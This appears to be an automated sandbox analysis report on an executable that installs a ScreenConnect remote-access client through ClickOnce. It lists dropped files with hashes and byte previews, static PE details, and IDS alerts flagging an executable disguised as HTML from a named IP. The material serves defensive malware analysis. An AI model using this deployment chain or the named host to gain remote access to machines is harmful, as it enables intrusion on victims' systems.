Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............" ..0..>...........]... ...`....... ..............................[.....@................................./]..O....`...............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............D..............@..B................c]......H.......t...h..............0....\........................................()...^.()..........%...}....:.().....}....:.().....}....:.().....}......s.....s+...:.(,.....(-.....{...."..}....J.(/........(0...&:.(,.....(1.....{2..."..}2....0..(........(3......+.............(0...&..X....i2.v.(,....s4...}.....s5...}....v.{.....r...p(...+.....o7.....0...........o8....+..o9......(...+&.o....-....,..o................."........{..........o:...&.......(.........0..L...

C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.Windows.dll.genman

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1982
Entropy (8bit):	5.057585371364542
Encrypted:	false
SSDEEP:	24:JdFYZ8h9onRbggeP0AuEvSkcyMuscVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AbHMrGQAXRTFgTo
MD5:	50FC8E2B16CC5920B0536C1F5DD4AEAE
SHA1:	6060C72B1A84B8BE7BAC2ACC9C1CEBD95736F3D6
SHA-256:	95855EF8E55A75B5B0B17207F8B4BA9370CD1E5B04BCD56976973FD4E731454A
SHA-512:	BD40E38CAC8203D8E33F0F7E50E2CAB9CFB116894D6CA2D2D3D369E277D93CDA45A31E8345AFC3039B20DD4118DC8296211BADFFA3F1B81E10D14298DD842D05
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depen

C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.WindowsBackstageShell.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	61216
Entropy (8bit):	6.31175789874945
Encrypted:	false
SSDEEP:	1536:SW/+lo6MOc8IoiKWjbNv8DtyQ4RE+TC6VAhVbIF7fIxp:SLlo6dccl9yQGVtFra
MD5:	6DF2DEF5E591E2481E42924B327A9F15
SHA1:	38EAB6E9D99B5CAEEC9703884D25BE8D811620A9
SHA-256:	B6A05985C4CF111B94A4EF83F6974A70BF623431187691F2D4BE0332F3899DA9
SHA-512:	5724A20095893B722E280DBF382C9BFBE75DD4707A98594862760CBBD5209C1E55EEAF70AD23FA555D62C7F5E54DE1407FB98FC552F42DCCBA5D60800965C6A5
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L............."...0.................. ........@.. ....................... ......3]....@.....................................O.......,............... )..............8............................................ ............... ..H............text........ ...................... ..`.rsrc...,...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....^.(.......a...%...}....:.(......}....:.(......}....:.(......}........0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!......0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..

C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.WindowsBackstageShell.exe.config

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.842791478883622
Encrypted:	false
SSDEEP:	6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
MD5:	728175E20FFBCEB46760BB5E1112F38B
SHA1:	2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
SHA-256:	87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
SHA-512:	FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.WindowsClient.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	601376
Entropy (8bit):	6.185921191564225
Encrypted:	false
SSDEEP:	6144:r+z3H0n063rDHWP5hLG/6XixJQm16Eod7ZeYai1FzJTZJ5BCEOG6y9QsZSc4F2/Q:qzEjrTWPMLBfWFaSdJ5BeG6xs6/yRod
MD5:	20AB8141D958A58AADE5E78671A719BF
SHA1:	F914925664AB348081DAFE63594A64597FB2FC43
SHA-256:	9CFD2C521D6D41C3A86B6B2C3D9B6A042B84F2F192F988F65062F0E1BFD99CAB
SHA-512:	C5DD5ED90C516948D3D8C6DFA3CA7A6C8207F062883BA442D982D8D05A7DB0707AFEC3A0CB211B612D04CCD0B8571184FC7E81B2E98AE129E44C5C0E592A5563
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{<............"...0.................. ... ....@.. .......................`.......x....@.................................=...O.... .................. )...@..........8............................................ ............... ..H............text...`.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................q.......H........H................................................................{D.....{E...V.(F.....}D.....}E......0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...... }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N.....{O.....{P...V.(F.....}O.....}P....0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...... 1.c. )UU.

C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.WindowsClient.exe.config

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.842791478883622
Encrypted:	false
SSDEEP:	6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
MD5:	728175E20FFBCEB46760BB5E1112F38B
SHA1:	2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
SHA-256:	87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
SHA-512:	FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.WindowsClient.exe.genman

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	2573
Entropy (8bit):	5.026361555169168
Encrypted:	false
SSDEEP:	48:3FYZ8h9o5gI0AsHMrAXQ3MrTMrRGTDBTo:1YiW4AjEvEJ
MD5:	3133DE245D1C278C1C423A5E92AF63B6
SHA1:	D75C7D2F1E6B49A43B2F879F6EF06A00208EB6DC
SHA-256:	61578953C28272D15E8DB5FD1CFFB26E7E16B52ADA7B1B41416232AE340002B7
SHA-512:	B22D4EC1D99FB6668579FA91E70C182BEC27F2E6B4FF36223A018A066D550F4E90AAC3DFFD8C314E0D99B9F67447613CA011F384F693C431A7726CE0665D7647
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.

C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.WindowsClient.exe.manifest

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10074), with CRLF line terminators
Category:	dropped
Size (bytes):	17866
Entropy (8bit):	5.954687824833028
Encrypted:	false
SSDEEP:	384:ze1oEQwK45aMUf6FX9hJX9FX9R/QPIYM7Y7:zd6FX9hJX9FX9R/QPIN07
MD5:	1DC9DD74A43D10C5F1EAE50D76856F36
SHA1:	E4080B055DD3A290DB546B90BCF6C5593FF34F6D
SHA-256:	291FA1F674BE3CA15CFBAB6F72ED1033B5DD63BCB4AEA7FBC79FDCB6DD97AC0A
SHA-512:	91E8A1A1AEA08E0D3CF20838B92F75FA7A5F5DACA9AEAD5AB7013D267D25D4BF3D291AF2CA0CCE8B73027D9717157C2C915F2060B2262BAC753BBC159055DBDF
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.10.8991" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" paramet

C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.WindowsFileManager.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	81696
Entropy (8bit):	5.862223562830496
Encrypted:	false
SSDEEP:	1536:/tytl44RzbwI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7Yp7gxd:8/KukLdUpc
MD5:	B1799A5A5C0F64E9D61EE4BA465AFE75
SHA1:	7785DA04E98E77FEC7C9E36B8C68864449724D71
SHA-256:	7C39E98BEB59D903BC8D60794B1A3C4CE786F7A7AAE3274C69B507EBA94FAA80
SHA-512:	AD8C810D7CC3EA5198EE50F0CEB091A9F975276011B13B10A37306052697DC43E58A16C84FA97AB02D3927CD0431F62AEF27E500030607828B2129F305C27BE8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P............"...0..@...........^... ...`....@.. .......................`......j.....@..................................^..O....`.. ............... )...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc... ....`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....^.(.......;...%...}....:.(......}....:.(......}....:.(......}........0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(........(+...o,...(-...t....

C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.WindowsFileManager.exe.config

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.842791478883622
Encrypted:	false
SSDEEP:	6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
MD5:	728175E20FFBCEB46760BB5E1112F38B
SHA1:	2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
SHA-256:	87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
SHA-512:	FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

C:\Users\user\AppData\Local\Temp\Deployment\8Q5Z55XT.X5R\AP9GQL1K.LDJ.application

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63847), with CRLF line terminators
Category:	dropped
Size (bytes):	117980
Entropy (8bit):	5.585720273564656
Encrypted:	false
SSDEEP:	3072:0aNIcT51/FXvMVNWfCXq9ymSm2o9HuzhJOvP:0FcfiVI8mt8vOvP
MD5:	4E152D84C20AB6330FF0CF47A9AF7C6D
SHA1:	018F32D833124056FCCFC200318542687D0E5565
SHA-256:	5668723C31F6726947DFEDA324B26D27F7E899647C22A4B1B2BEA935BA8A6B10
SHA-512:	2F3F6B397072B795C74C44F19012483E2785DDEE5A7F5D7E38C566EBC9A94AE084504061F697DB714B933B79824CBC6B08B7718536A19FA21D11AD8D0F8AFB79
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tr

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\932a2db58c237abd381d22df4c63a04a_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	87
Entropy (8bit):	3.463057265798253
Encrypted:	false
SSDEEP:	3:/lqlhGXKRjgjkFmURueGvx2VTUz:4DRPAx2Kz
MD5:	D2DED43CE07BFCE4D1C101DFCAA178C8
SHA1:	CE928A1293EA2ACA1AC01B61A344857786AFE509
SHA-256:	8EEE9284E733B9D4F2E5C43F71B81E27966F5CD8900183EB3BB77A1F1160D050
SHA-512:	A05486D523556C75FAAEEFE09BB2F8159A111B1B3560142E19048E6E3898A506EE4EA27DD6A4412EE56A7CE7C21E8152B1CDD92804BAF9FAC43973FABE006A2F
Malicious:	false
Preview:	......../...............................Microsoft Enhanced Cryptographic Provider v1.0.

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.468575891451083
Encrypted:	false
SSDEEP:	6144:yzZfpi6ceLPx9skLmb0fJZWSP3aJG8nAgeiJRMMhA2zX4WABluuNljDH5S:UZHtJZWOKnMM6bFpbj4
MD5:	16AE52527DEAB9AB6ACC3E10A2CA8565
SHA1:	619DCDA70EA8CE96430C210281977087F5B49741
SHA-256:	2CCF6023F84E0F6DDE3F7D682FEF057652BEC6CFA01DFEE874F7553A98E4D7FB
SHA-512:	6B4E010A78F33F3006EE235E38CE8D3949B70486AA3DEE7F73D0E6EFA3D4F7F422B644DB316E5D85E66B5327EE1553B897599C967574B08001C3C456E9133115
Malicious:	false
Preview:	regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.2q.3...............................................................................................................................................................................................................................................................................................................................................#Kg%........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.514863173515808
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	mrKs8EKXbz.exe
File size:	83'352 bytes
MD5:	10777132fc1e95538acbe0728e10939d
SHA1:	fac1fa861f72f12a30852bff9085b2be852a7d52
SHA256:	9be96842563827373caedce47de8191e2be93f6d3286cf8b4286492be4445cad
SHA512:	0a9e3f6e8fa38ed56dfad0b074ff7361e2595b41e9e9e37163728dbc612aaffb1bbe03bc1b9db9e5c5031e028b3d91e442eb964c3b9048408e2a0ecd9ea19634
SSDEEP:	1536:BoG6KpY6Qi3yj2wyq4HwiMO10HVLCJRpsWr6cdaxPBJYYF7mxD2:7enkyfPAwiMq0RqRfbaxZJYYFR
TLSH:	4E835B43B5D18875E9720E3118B1D9B4593FBE110EA48EAB3398426E0F351D19E3AE7B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ycId...d...d.......n...............\|.......A.......v.......v...m`..a...d...........e.......e.......e...Richd...........PE..L..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x401489
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x66BBDDB2 [Tue Aug 13 22:26:58 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	37d5c89163970dd3cc69230538a1b72b

Authenticode Signature

Signature Valid:	true
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The operation completed successfully
Error Number:	0
Not Before, Not After	17/08/2022 02:00:00 16/08/2025 01:59:59
Subject Chain	CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
Version:	3
Thumbprint MD5:	AAE704EC2810686C3BF7704E660AFB5D
Thumbprint SHA-1:	4C2272FBA7A7380F55E2A424E9E624AEE1C14579
Thumbprint SHA-256:	82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
Serial:	0B9360051BCCF66642998998D5BA97CE

Entrypoint Preview

Instruction
call 00007FD2A4E5C61Ah
jmp 00007FD2A4E5C0CFh
push ebp
mov ebp, esp
push 00000000h
call dword ptr [0040B048h]
push dword ptr [ebp+08h]
call dword ptr [0040B044h]
push C0000409h
call dword ptr [0040B04Ch]
push eax
call dword ptr [0040B050h]
pop ebp
ret
push ebp
mov ebp, esp
sub esp, 00000324h
push 00000017h
call dword ptr [0040B054h]
test eax, eax
je 00007FD2A4E5C257h
push 00000002h
pop ecx
int 29h
mov dword ptr [004118C0h], eax
mov dword ptr [004118BCh], ecx
mov dword ptr [004118B8h], edx
mov dword ptr [004118B4h], ebx
mov dword ptr [004118B0h], esi
mov dword ptr [004118ACh], edi
mov word ptr [004118D8h], ss
mov word ptr [004118CCh], cs
mov word ptr [004118A8h], ds
mov word ptr [004118A4h], es
mov word ptr [004118A0h], fs
mov word ptr [0041189Ch], gs
pushfd
pop dword ptr [004118D0h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [004118C4h], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [004118C8h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [004118D4h], eax
mov eax, dword ptr [ebp-00000324h]
mov dword ptr [00411810h], 00010001h

Rich Headers

Programming Language:

[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1060c	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x13000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x11800	0x2d98
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x14000	0xddc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xfe38	0x70	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xfd78	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xb000	0x13c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9cf8	0x9e00	bae4521030709e187bdbe8a34d7bf731	False	0.6035650712025317	data	6.581464957368758	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xb000	0x5d58	0x5e00	ec94ce6ebdbe57640638e0aa31d08896	False	0.4178025265957447	Applesoft BASIC program data, first line number 1	4.843224204192078	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x11000	0x11cc	0x800	04a548a5c04675d08166d3823a6bf61b	False	0.16357421875	data	2.0120795802951505	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x13000	0x1e0	0x200	aa256780346be2e1ee49ac6d69d2faff	False	0.52734375	data	4.703723272345726	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x14000	0xddc	0xe00	908329e10a1923a3c4938a10d44237d9	False	0.7776227678571429	data	6.495696626464028	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x13060	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL

Import

KERNEL32.dll

LocalFree, GetProcAddress, LoadLibraryA, Sleep, LocalAlloc, GetModuleFileNameW, DecodePointer, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, GetModuleFileNameA, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap, HeapSize, HeapReAlloc, FlushFileBuffers, GetConsoleCP, GetConsoleMode, SetFilePointerEx, WriteConsoleW, CreateFileW

CRYPT32.dll

CertDeleteCertificateFromStore, CryptMsgGetParam, CertCloseStore, CryptQueryObject, CertAddCertificateContextToStore, CertFindAttribute, CertFreeCertificateContext, CertCreateCertificateContext, CertOpenSystemStoreA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-30T14:20:08.170802+0200	2009897	ET MALWARE Possible Windows executable sent when remote host claims to send html content	1	79.110.49.196	443	192.168.2.6	49726	TCP
2024-09-30T14:20:09.324205+0200	2009897	ET MALWARE Possible Windows executable sent when remote host claims to send html content	1	79.110.49.196	443	192.168.2.6	49727	TCP
2024-09-30T14:20:13.349058+0200	2009897	ET MALWARE Possible Windows executable sent when remote host claims to send html content	1	79.110.49.196	443	192.168.2.6	49732	TCP
